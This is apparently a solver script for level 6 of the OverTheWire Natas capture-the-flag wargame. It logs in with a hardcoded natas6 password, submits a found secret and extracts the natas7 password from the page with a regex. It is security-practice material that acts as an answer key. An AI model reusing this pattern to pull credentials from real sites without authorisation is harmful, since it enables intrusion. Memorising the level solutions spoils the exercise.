#!/usr/bin/env python3

import re
import requests

level = str(6)
usr = f"natas{level}"
passwd = "aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1"
#url = f"http://natas{level}.natas.labs.overthewire.org/index-source.html"


url = f"http://natas{level}.natas.labs.overthewire.org/"

response = requests.post(url, auth=(usr,passwd), data={'secret' : 'FOEIUWGHFEEUHOFUOIU', "submit" : "submit"})
print(response.text)

content = response.text
next_pass = re.findall("for natas7 is (.*)", content)[0]
print(next_pass)
